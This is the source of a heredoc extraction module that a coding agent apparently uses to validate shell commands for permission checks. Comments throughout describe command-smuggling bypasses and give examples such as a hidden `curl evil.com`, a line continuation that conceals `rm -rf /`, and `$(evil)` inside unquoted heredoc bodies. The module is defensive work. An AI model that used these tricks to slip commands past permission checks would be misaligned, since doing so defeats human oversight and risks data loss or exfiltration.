// Source dump of claude code
// (at main, 733 lines, 32 kB)
/**
 * Heredoc extraction and restoration utilities.
 *
 * The shell-quote library parses `<<` as two separate `<` redirect operators,
 * which breaks command splitting for heredoc syntax. This module provides
 * utilities to extract heredocs before parsing and restore them after.
 *
 * Supported heredoc variations:
 * - <<WORD - basic heredoc
 * - <<'WORD' - single-quoted delimiter (no variable expansion in content)
 * - <<"WORD" - double-quoted delimiter (with variable expansion)
 * - <<-WORD - dash prefix (strips leading tabs from content)
 * - <<-'WORD' - combined dash and quoted delimiter
 *
 * Known limitations:
 * - Heredocs inside backtick command substitution may not be extracted
 * - Very complex multi-heredoc scenarios may not be extracted
 *
 * When extraction fails, the command passes through unchanged. This is safe
 * because the unextracted heredoc will either cause shell-quote parsing to fail
 * (falling back to treating the whole command as one unit) or require manual
 * approval for each apparent subcommand.
 *
 * @module
 */

import { randomBytes } from 'crypto'

const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_'
const HEREDOC_PLACEHOLDER_SUFFIX = '__'

/**
 * Generates a random hex string for placeholder uniqueness.
 * This prevents collision when command text literally contains "__HEREDOC_N__".
 *
 * @returns 16 lowercase hex characters (8 random bytes)
 */
function generatePlaceholderSalt(): string {
  // Generate 8 random bytes as hex (16 characters)
  return randomBytes(8).toString('hex')
}

/**
 * Regex pattern for matching heredoc start syntax.
 *
 * Two alternatives handle quoted vs unquoted delimiters differently:
 *
 * Alternative 1 (quoted): (['"]) (\\?\w+) \2
 *   Captures the opening quote, then the delimiter word (which MAY include a
 *   leading backslash since it's literal inside quotes), then the closing quote.
 *   In bash, single quotes make EVERYTHING literal including backslashes:
 *     <<'\EOF' → delimiter is \EOF (with backslash)
 *     <<'EOF'  → delimiter is EOF
 *   Double quotes also preserve backslashes before non-special chars:
 *     <<"\EOF" → delimiter is \EOF
 *
 * Alternative 2 (unquoted): \\?(\w+)
 *   Optionally consumes a leading backslash (escape), then captures the word.
 *   In bash, an unquoted backslash escapes the next character:
 *     <<\EOF → delimiter is EOF (backslash consumed as escape)
 *     <<EOF  → delimiter is EOF (plain)
 *
 * SECURITY: The backslash MUST be inside the capture group for quoted
 * delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside
 * the capture group unconditionally, causing <<'\EOF' to extract delimiter
 * "EOF" while bash uses "\EOF", allowing command smuggling.
 *
 * Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be
 * a security issue (could hide commands between << and the delimiter).
 */
const HEREDOC_START_PATTERN =
  // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
  /(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/

export type HeredocInfo = {
  /** The full heredoc text including << operator, delimiter, content, and closing delimiter */
  fullText: string
  /** The delimiter word (without quotes) */
  delimiter: string
  /** Start position of the << operator in the original command */
  operatorStartIndex: number
  /** End position of the << operator (exclusive) - content on same line after this is preserved */
  operatorEndIndex: number
  /** Start position of heredoc content (the newline before content) */
  contentStartIndex: number
  /** End position of heredoc content including closing delimiter (exclusive) */
  contentEndIndex: number
}

export type HeredocExtractionResult = {
  /** The command with heredocs replaced by placeholders */
  processedCommand: string
  /** Map of placeholder string to original heredoc info */
  heredocs: Map<string, HeredocInfo>
}

/**
 * Extracts heredocs from a command string and replaces them with placeholders.
 *
 * This allows shell-quote to parse the command without mangling heredoc syntax.
 * After parsing, use `restoreHeredocs` to replace placeholders with original content.
 *
 * Whenever a construct is seen that this simplified parser cannot track
 * reliably, the command (or the individual heredoc) is left untouched rather
 * than extracted with possibly wrong boundaries.
 *
 * @param command - The shell command string potentially containing heredocs
 * @param options - Optional flags. `quotedOnly`: when true, heredocs with an
 *   unquoted, unescaped delimiter are NOT extracted (their bodies stay visible
 *   in `processedCommand`); their body ranges are still tracked so that
 *   heredoc-looking text inside or overlapping them is not extracted either.
 * @returns Object containing the processed command and a map of placeholders to heredoc info
 *
 * @example
 * ```ts
 * const result = extractHeredocs(`cat <<EOF
 * hello world
 * EOF`);
 * // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies)
 * // result.heredocs has the mapping to restore later
 * ```
 */
export function extractHeredocs(
  command: string,
  options?: { quotedOnly?: boolean },
): HeredocExtractionResult {
  const heredocs = new Map<string, HeredocInfo>()

  // Quick check: if no << present, skip processing
  if (!command.includes('<<')) {
    return { processedCommand: command, heredocs }
  }

  // Security: Paranoid pre-validation. Our incremental quote/comment scanner
  // (see advanceScan below) does simplified parsing that cannot handle all
  // bash quoting constructs. If the command contains
  // constructs that could desync our quote tracking, bail out entirely
  // rather than risk extracting a heredoc with incorrect boundaries.
  // This is defense-in-depth: each construct below has caused or could
  // cause a security bypass if we attempt extraction.
  //
  // Specifically, we bail if the command contains:
  // 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker
  //    doesn't handle the $ prefix, would misparse the quotes)
  // 2. Backtick command substitution (backtick nesting has complex parsing
  //    rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in
  //    make_cmd.c:606, enabling early heredoc closure that our parser
  //    can't replicate)
  if (/\$['"]/.test(command)) {
    return { processedCommand: command, heredocs }
  }
  // Check for backticks in the command text before the first <<.
  // Backtick nesting has complex parsing rules, and backtick acts as
  // shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early
  // heredoc closure that our parser can't replicate. We only check
  // before << because backticks in heredoc body content are harmless.
  const firstHeredocPos = command.indexOf('<<')
  if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
    return { processedCommand: command, heredocs }
  }

  // Security: Check for arithmetic evaluation context before the first `<<`.
  // In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
  // heredoc. If we mis-extract it, subsequent lines become "heredoc content"
  // and are hidden from security validators, while bash executes them as
  // separate commands. We bail entirely if `((` appears before `<<` without
  // a matching `))` — we can't reliably distinguish arithmetic `<<` from
  // heredoc `<<` in that context. Note: $(( is already caught by
  // validateDangerousPatterns, but bare (( is not.
  if (firstHeredocPos > 0) {
    const beforeHeredoc = command.slice(0, firstHeredocPos)
    // Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
    const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
    const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
    if (openArith > closeArith) {
      return { processedCommand: command, heredocs }
    }
  }

  // Create a global version of the pattern for iteration
  const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')

  const heredocMatches: HeredocInfo[] = []
  // Security: When quotedOnly skips an unquoted heredoc, we still need to
  // track its content range so the nesting filter can reject quoted heredocs
  // that appear INSIDE the skipped unquoted heredoc's body. Without this,
  // `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a
  // top-level heredoc, hiding $(evil) from validators — even though in bash,
  // $(evil) IS executed (unquoted <<EOF expands its body).
  const skippedHeredocRanges: Array<{
    contentStartIndex: number
    contentEndIndex: number
  }> = []
  let match: RegExpExecArray | null

  // Incremental quote/comment scanner state.
  //
  // The regex walks forward through the command, and match.index is monotonically
  // increasing. Previously, isInsideQuotedString and isInsideComment each
  // re-scanned from position 0 on every match — O(n²) when the heredoc body
  // contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++
  // heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation
  // calls extractHeredocs multiple times per command.
  //
  // Instead, track quote/comment/escape state incrementally and advance from
  // the last scanned position. This preserves the OLD helpers' exact semantics:
  //
  //   Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees
  //   `#` and never skips characters for being "in a comment". Inside single
  //   quotes, everything is literal. Inside double quotes, backslash escapes
  //   the next char. An unquoted backslash run of odd length escapes the next
  //   char.
  //
  //   Comment state (was isInsideComment) observes quote state (# inside quotes
  //   is not a comment) but NOT the reverse. The old helper used a per-call
  //   `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider;
  //   equivalently, any physical `\n` clears comment state — including `\n`
  //   inside quotes (since lastIndexOf was quote-blind).
  //
  // SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
  // the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
  // (where bash treats `#` as part of the word `x#`, NOT a comment) would
  // report the `<<` as unquoted and EXTRACT it — hiding content from security
  // validators. The old isInsideQuotedString was comment-blind; we preserve
  // that. Both old and new over-eagerly treat any unquoted `#` as a comment
  // (bash requires word-start), but since quote tracking is independent, the
  // over-eagerness only affects the comment check — causing SKIPS (safe
  // direction), never extra EXTRACTIONS.
  let scanPos = 0
  let scanInSingleQuote = false
  let scanInDoubleQuote = false
  let scanInComment = false
  // Inside "...": true if the previous char was a backslash (next char is escaped).
  // Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
  // the char at scanPos.
  let scanDqEscapeNext = false
  // Unquoted context: length of the consecutive backslash run ending at scanPos-1.
  // Used to determine if the char at scanPos is escaped (odd run = escaped).
  let scanPendingBackslashes = 0

  const advanceScan = (target: number): void => {
    for (let i = scanPos; i < target; i++) {
      const ch = command[i]!

      // Any physical newline clears comment state. The old isInsideComment
      // used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a
      // `\n` inside quotes still advanced lineStart. Match that here by
      // clearing BEFORE the quote branches.
      if (ch === '\n') scanInComment = false

      if (scanInSingleQuote) {
        if (ch === "'") scanInSingleQuote = false
        continue
      }

      if (scanInDoubleQuote) {
        if (scanDqEscapeNext) {
          scanDqEscapeNext = false
          continue
        }
        if (ch === '\\') {
          scanDqEscapeNext = true
          continue
        }
        if (ch === '"') scanInDoubleQuote = false
        continue
      }

      // Unquoted context. Quote tracking is COMMENT-BLIND (same as the old
      // isInsideQuotedString): we do NOT skip chars for being inside a
      // comment. Only the `#` detection itself is gated on not-in-comment.
      if (ch === '\\') {
        scanPendingBackslashes++
        continue
      }
      const escaped = scanPendingBackslashes % 2 === 1
      scanPendingBackslashes = 0
      if (escaped) continue

      if (ch === "'") scanInSingleQuote = true
      else if (ch === '"') scanInDoubleQuote = true
      else if (!scanInComment && ch === '#') scanInComment = true
    }
    scanPos = target
  }

  while ((match = heredocStartPattern.exec(command)) !== null) {
    const startIndex = match.index

    // Advance the incremental scanner to this match's position. After this,
    // scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
    // state immediately BEFORE startIndex, and scanPendingBackslashes is the
    // count of unquoted `\` immediately preceding startIndex.
    advanceScan(startIndex)

    // Skip if this << is inside a quoted string (not a real heredoc operator).
    if (scanInSingleQuote || scanInDoubleQuote) {
      continue
    }

    // Security: Skip if this << is inside a comment (after unquoted #).
    // In bash, `# <<EOF` is a comment — extracting it would hide commands on
    // subsequent lines as "heredoc content" while bash executes them.
    if (scanInComment) {
      continue
    }

    // Security: Skip if this << is preceded by an odd number of backslashes.
    // In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
    // is input redirection. Extracting it would drop same-line commands from
    // security checks. The scanner tracks the unquoted backslash run ending
    // immediately before startIndex (scanPendingBackslashes).
    if (scanPendingBackslashes % 2 === 1) {
      continue
    }

    // Security: Bail if this `<<` falls inside the body of a previously
    // SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash,
    // `<<` inside a heredoc body is just text — it's not a nested heredoc
    // operator. Extracting it would hide content that bash actually expands.
    let insideSkipped = false
    for (const skipped of skippedHeredocRanges) {
      if (
        startIndex > skipped.contentStartIndex &&
        startIndex < skipped.contentEndIndex
      ) {
        insideSkipped = true
        break
      }
    }
    if (insideSkipped) {
      continue
    }

    const fullMatch = match[0]
    const isDash = match[1] === '-'
    // Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
    const delimiter = (match[3] || match[4])!
    const operatorEndIndex = startIndex + fullMatch.length

    // Security: Two checks to verify our regex captured the full delimiter word.
    // Any mismatch between our parsed delimiter and bash's actual delimiter
    // could allow command smuggling past permission checks.

    // Check 1: If a quote was captured (group 2), verify the closing quote
    // was actually matched by \2 in the regex (the quoted alternative requires
    // the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so
    // non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop
    // early, leaving the closing quote unmatched.
    // Example: <<"EO F" — regex captures "EO", misses closing ", delimiter
    // should be "EO F" but we'd use "EO". Skip to prevent mismatch.
    const quoteChar = match[2]
    if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
      continue
    }

    // Security: Determine if the delimiter is quoted ('EOF', "EOF") or
    // escaped (\EOF). In bash, quoted/escaped delimiters suppress all
    // expansion in the heredoc body — content is literal text. Unquoted
    // delimiters (<<EOF) perform full shell expansion: $(), backticks,
    // and ${} in the body ARE executed. When quotedOnly is set, skip
    // unquoted heredocs so their bodies remain visible to security
    // validators (they may contain executable command substitutions).
    const isEscapedDelimiter = fullMatch.includes('\\')
    const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter
    // Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is
    // set. Instead, we compute their content range and add them to
    // skippedHeredocRanges, then skip them AFTER finding the closing
    // delimiter. This lets the nesting filter correctly reject quoted
    // "heredocs" that appear inside unquoted heredoc bodies.

    // Check 2: Verify the next character after our match is a bash word
    // terminator (metacharacter or end of string). Characters like word chars,
    // quotes, $, \ mean the bash word extends beyond our match
    // (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
    // IMPORTANT: Only match bash's actual metacharacters — space (0x20),
    // tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
    // also matches \r, \f, \v, and Unicode whitespace that bash treats as
    // regular word characters, not terminators.
    if (operatorEndIndex < command.length) {
      const nextChar = command[operatorEndIndex]!
      if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
        continue
      }
    }

    // In bash, heredoc content starts on the NEXT LINE after the operator.
    // Any content on the same line after <<EOF (like " && echo done") is part
    // of the command, not the heredoc content.
    //
    // SECURITY: The "same line" must be the LOGICAL command line, not the
    // first physical newline. Multi-line quoted strings extend the logical
    // line — bash waits for the quote to close before starting to read the
    // heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
    // quoted strings, causing the body to start too early.
    //
    // Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
    //   - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
    //   - Bash: waits for `'` to close → logical line is
    //     `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF`
    //   - Our old code: indexOf('\n') finds the quoted newline → body starts
    //     at `' ; curl evil.com\nEOF` → curl swallowed into placeholder →
    //     NEVER reaches permission checks.
    //
    // Fix: scan forward from operatorEndIndex using quote-state tracking,
    // finding the first newline that's NOT inside a quoted string. Same
    // quote-tracking semantics as advanceScan (already used to validate
    // the `<<` operator position above).
    let firstNewlineOffset = -1
    {
      let inSingleQuote = false
      let inDoubleQuote = false
      // We start with clean quote state — advanceScan already rejected the
      // case where the `<<` operator itself is inside a quote.
      for (let k = operatorEndIndex; k < command.length; k++) {
        const ch = command[k]
        if (inSingleQuote) {
          if (ch === "'") inSingleQuote = false
          continue
        }
        if (inDoubleQuote) {
          if (ch === '\\') {
            k++ // skip escaped char inside double quotes
            continue
          }
          if (ch === '"') inDoubleQuote = false
          continue
        }
        // Unquoted context
        if (ch === '\n') {
          firstNewlineOffset = k - operatorEndIndex
          break
        }
        // Count backslashes for escape detection in unquoted context
        let backslashCount = 0
        for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
          backslashCount++
        }
        if (backslashCount % 2 === 1) continue // escaped char
        if (ch === "'") inSingleQuote = true
        else if (ch === '"') inDoubleQuote = true
      }
      // If we ended while still inside a quote, the logical line never ends —
      // there is no heredoc body. Leave firstNewlineOffset as -1 (handled below).
    }

    // If no unquoted newline found, this heredoc has no content - skip it
    if (firstNewlineOffset === -1) {
      continue
    }

    // Security: Check for backslash-newline continuation at the end of the
    // same-line content (text between the operator and the newline). In bash,
    // `\<newline>` joins lines BEFORE heredoc parsing — so:
    //   cat <<'EOF' && \
    //   rm -rf /
    //   content
    //   EOF
    // bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
    // then heredoc body = `content`. Our extractor runs BEFORE continuation
    // joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
    // hiding it from all validators. Bail if same-line content ends with an
    // odd number of backslashes.
    const sameLineContent = command.slice(
      operatorEndIndex,
      operatorEndIndex + firstNewlineOffset,
    )
    let trailingBackslashes = 0
    for (let j = sameLineContent.length - 1; j >= 0; j--) {
      if (sameLineContent[j] === '\\') {
        trailingBackslashes++
      } else {
        break
      }
    }
    if (trailingBackslashes % 2 === 1) {
      // Odd number of trailing backslashes → last one escapes the newline
      // → this is a line continuation. Our heredoc-before-continuation order
      // would misparse this. Bail out.
      continue
    }

    const contentStartIndex = operatorEndIndex + firstNewlineOffset
    const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
    const contentLines = afterNewline.split('\n')

    // Find the closing delimiter - must be on its own line
    // Security: Must match bash's exact behavior to prevent parsing discrepancies
    // that could allow command smuggling past permission checks.
    let closingLineIndex = -1
    for (let i = 0; i < contentLines.length; i++) {
      const line = contentLines[i]!

      if (isDash) {
        // <<- strips leading TABS only (not spaces), per POSIX/bash spec.
        // The line after stripping leading tabs must be exactly the delimiter.
        const stripped = line.replace(/^\t*/, '')
        if (stripped === delimiter) {
          closingLineIndex = i
          break
        }
      } else {
        // << requires the closing delimiter to be exactly alone on the line
        // with NO leading or trailing whitespace. This matches bash behavior.
        if (line === delimiter) {
          closingLineIndex = i
          break
        }
      }

      // Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
      // Inside $(), ${}, or backtick substitution, bash closes a heredoc when
      // a line STARTS with the delimiter and contains the shell_eof_token
      // (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
      // line matching, so this discrepancy could hide smuggled commands.
      //
      // Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
      // >) after the delimiter, which could indicate command syntax from a
      // parsing discrepancy we haven't identified.
      //
      // For <<- heredocs, bash strips leading tabs before this check.
      const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
      if (
        eofCheckLine.length > delimiter.length &&
        eofCheckLine.startsWith(delimiter)
      ) {
        const charAfterDelimiter = eofCheckLine[delimiter.length]!
        if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
          // Shell metacharacter or substitution closer after delimiter —
          // bash may close the heredoc early here. Bail out.
          closingLineIndex = -1
          break
        }
      }
    }

    // Security: If quotedOnly mode is set and this is an unquoted heredoc,
    // record its content range for nesting checks but do NOT add it to
    // heredocMatches. This ensures quoted "heredocs" inside its body are
    // correctly rejected by the insideSkipped check on subsequent iterations.
    //
    // CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
    // unquoted heredoc has no closing delimiter, bash still treats everything
    // to end-of-input as the heredoc body (and expands $() within it). We
    // must block extraction of any subsequent quoted "heredoc" that falls
    // inside that unbounded body.
    if (options?.quotedOnly && !isQuotedOrEscaped) {
      let skipContentEndIndex: number
      if (closingLineIndex === -1) {
        // No closing delimiter — in bash, heredoc body extends to end of
        // input. Track the entire remaining range as "skipped body".
        skipContentEndIndex = command.length
      } else {
        const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
        const skipContentLength = skipLinesUpToClosing.join('\n').length
        skipContentEndIndex = contentStartIndex + 1 + skipContentLength
      }
      skippedHeredocRanges.push({
        contentStartIndex,
        contentEndIndex: skipContentEndIndex,
      })
      continue
    }

    // If no closing delimiter found, this is malformed - skip it
    if (closingLineIndex === -1) {
      continue
    }

    // Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter
    const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
    const contentLength = linesUpToClosing.join('\n').length
    const contentEndIndex = contentStartIndex + 1 + contentLength

    // Security: Bail if this heredoc's content range OVERLAPS with any
    // previously-skipped heredoc's content range. This catches the case where
    // two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
    // is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
    // share a line, their bodies appear SEQUENTIALLY (first's body, then
    // second's). Both compute contentStartIndex from the SAME newline, so the
    // second's body search walks through the first's body. For:
    //   cat <<EOF <<'SAFE'
    //   $(evil_command)
    //   EOF
    //   safe body
    //   SAFE
    // ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
    // swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
    // <<EOF's expansion) into the placeholder, hiding it from validators.
    //
    // The insideSkipped check above doesn't catch this because the quoted
    // operator's startIndex is on the command line BEFORE contentStart.
    // The contentStartPositions dedup check below doesn't catch it because the
    // skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
    let overlapsSkipped = false
    for (const skipped of skippedHeredocRanges) {
      // Ranges [a,b) and [c,d) overlap iff a < d && c < b
      if (
        contentStartIndex < skipped.contentEndIndex &&
        skipped.contentStartIndex < contentEndIndex
      ) {
        overlapsSkipped = true
        break
      }
    }
    if (overlapsSkipped) {
      continue
    }

    // Build fullText: operator + newline + content (normalized form for restoration)
    // This creates a clean heredoc that can be restored correctly
    const operatorText = command.slice(startIndex, operatorEndIndex)
    const contentText = command.slice(contentStartIndex, contentEndIndex)
    const fullText = operatorText + contentText

    heredocMatches.push({
      fullText,
      delimiter,
      operatorStartIndex: startIndex,
      operatorEndIndex,
      contentStartIndex,
      contentEndIndex,
    })
  }

  // If no valid heredocs found, return original
  if (heredocMatches.length === 0) {
    return { processedCommand: command, heredocs }
  }

  // Filter out nested heredocs - any heredoc whose operator starts inside
  // another heredoc's content range should be excluded.
  // This prevents corruption when heredoc content contains << patterns.
  const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
    // Check if this candidate's operator is inside any other heredoc's content
    for (const other of all) {
      if (candidate === other) continue
      // Check if candidate's operator starts within other's content range
      if (
        candidate.operatorStartIndex > other.contentStartIndex &&
        candidate.operatorStartIndex < other.contentEndIndex
      ) {
        // This heredoc is nested inside another - filter it out
        return false
      }
    }
    return true
  })

  // If filtering removed all heredocs, return original
  if (topLevelHeredocs.length === 0) {
    return { processedCommand: command, heredocs }
  }

  // Check for multiple heredocs sharing the same content start position
  // (i.e., on the same line). This causes index corruption during replacement
  // because indices are calculated on the original string but applied to
  // a progressively modified string. Return without extraction - the fallback
  // is safe (requires manual approval or fails parsing).
  const contentStartPositions = new Set(
    topLevelHeredocs.map(h => h.contentStartIndex),
  )
  if (contentStartPositions.size < topLevelHeredocs.length) {
    return { processedCommand: command, heredocs }
  }

  // Sort by content end position descending so we can replace from end to start
  // (this preserves indices for earlier replacements)
  topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)

  // Generate a unique salt for this extraction to prevent placeholder collisions
  // with literal "__HEREDOC_N__" text in commands
  const salt = generatePlaceholderSalt()

  let processedCommand = command
  topLevelHeredocs.forEach((info, index) => {
    // Use reverse index since we sorted descending
    const placeholderIndex = topLevelHeredocs.length - 1 - index
    const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`

    heredocs.set(placeholder, info)

    // Replace heredoc with placeholder while preserving same-line content:
    // - Keep everything before the operator
    // - Replace operator with placeholder
    // - Keep content between operator and heredoc content (e.g., " && echo done")
    // - Remove the heredoc content (from newline through closing delimiter)
    // - Keep everything after the closing delimiter
    processedCommand =
      processedCommand.slice(0, info.operatorStartIndex) +
      placeholder +
      processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
      processedCommand.slice(info.contentEndIndex)
  })

  return { processedCommand, heredocs }
}

/**
 * Restores heredoc placeholders back to their original content in a single string.
 * Internal helper used by restoreHeredocs.
 *
 * @param text - String that may contain heredoc placeholders
 * @param heredocs - Map of placeholder string to the heredoc it stands for
 * @returns `text` with every occurrence of every placeholder replaced by the
 *   corresponding `fullText`, inserted verbatim
 */
function restoreHeredocsInString(
  text: string,
  heredocs: Map<string, HeredocInfo>,
): string {
  let result = text
  for (const [placeholder, info] of heredocs) {
    // Substitute literally via split/join. A string passed as the replacement
    // argument of replace()/replaceAll() is scanned for `$$`, `$&`, `` $` ``
    // and `$'` patterns, which would corrupt heredoc bodies containing them
    // (e.g. the shell PID `$$` would be restored as a single `$`).
    result = result.split(placeholder).join(info.fullText)
  }
  return result
}

/**
 * Restores heredoc placeholders in an array of strings.
 *
 * @param parts - Array of strings that may contain heredoc placeholders
 * @param heredocs - The map of placeholders from `extractHeredocs`
 * @returns Array with placeholders replaced by original heredoc content; when
 *   `heredocs` is empty, `parts` itself is returned unchanged (not a copy)
 */
export function restoreHeredocs(
  parts: string[],
  heredocs: Map<string, HeredocInfo>,
): string[] {
  if (heredocs.size === 0) {
    return parts
  }

  return parts.map(part => restoreHeredocsInString(part, heredocs))
}

/**
 * Checks if a command contains heredoc syntax.
 *
 * This is a quick check that doesn't validate the heredoc is well-formed,
 * just that the pattern exists.
 *
 * @param command - The shell command string
 * @returns true if the command appears to contain heredoc syntax
 */
export function containsHeredoc(command: string): boolean {
  return HEREDOC_START_PATTERN.test(command)
}